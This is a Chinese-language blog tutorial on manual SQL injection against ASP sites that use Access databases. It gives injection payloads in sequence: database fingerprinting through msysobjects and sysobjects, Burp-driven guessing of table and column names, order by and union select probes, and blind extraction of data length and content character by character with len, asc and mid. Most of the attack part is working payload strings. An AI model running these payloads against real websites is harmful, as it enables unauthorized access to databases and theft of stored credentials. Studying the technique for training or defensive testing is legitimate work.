网络安全进阶学习第十二课——SQL手工注入3(Access数据库)


注入流程:

判断数据库类型 ——> 判断表名 ——> 判断列名 ——> 判断列名长度 ——> 查出数据。


asp的网站,常用数据库为access、sqlserver。

1、判断数据库类型

and exsits (select * from msysobjects)>0 access
and exsits (select * from sysobjects)>0 sqlserver

上述语句会返回1或者0
msysobjects是access的默认数据库
sysobjects是sqlserver的默认数据库

如图:
在这里插入图片描述
在这里插入图片描述
这里就能判断是access的数据库。


2、判断表名

遍历表名:and exists (select * from 表名)
#存在就返回正常页面,不存在就报错。

举例:
and exists (select * from admin_user)

使用BP对后面的admin_user所在位置的值进行遍历
假设这里跑出来表名就是:admin_user


3、判断列名

遍历列名:and exists (select 列名 from 表名)
#存在就返回正常页面,不存在就报错。

举例:
and exists (select admin from admin_user)

已经得知表名是admin_user,使用BP对列名admin所在位置的值进行遍历
假设这里跑出来列名就是:admin


4、判断列数

order by 7
在这里插入图片描述
前提:页面中需要有显示位

1)判断显示位

使用联合查询
union select 1,2,3,4,5,6,7 from admin_user


5、判断数据长度

and (select top 1 len(列名) from 表名)>5
#此为此列第一条数据的长度,判断其是不是大于5

and (select top 1 len(列名) from 表名)=5
#此为此列第一条数据的长度是不是等于5

举例:
and (select top 1 len(admin) from admin_user)=5

假如返回是真,那就说明admin_user这个表里面对应的admin这一列的第一个数据长度时5.


6、爆破数据内容

and (select top 1 asc(mid(列名,位数,1)) from admin)=97
#mid()用于从文本中提取字段,mid(列名,起始位置,要返回的字符数)
#asc()是进行ASCII编码

举例:
and (select top 1 asc(mid(admin,1,1)) from admin_user)=97(97对应的字母为a)

#若返回真,说明admin_user这个表中admin字段对应的那一列的第一条数据的第一位是 ’ a ’


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值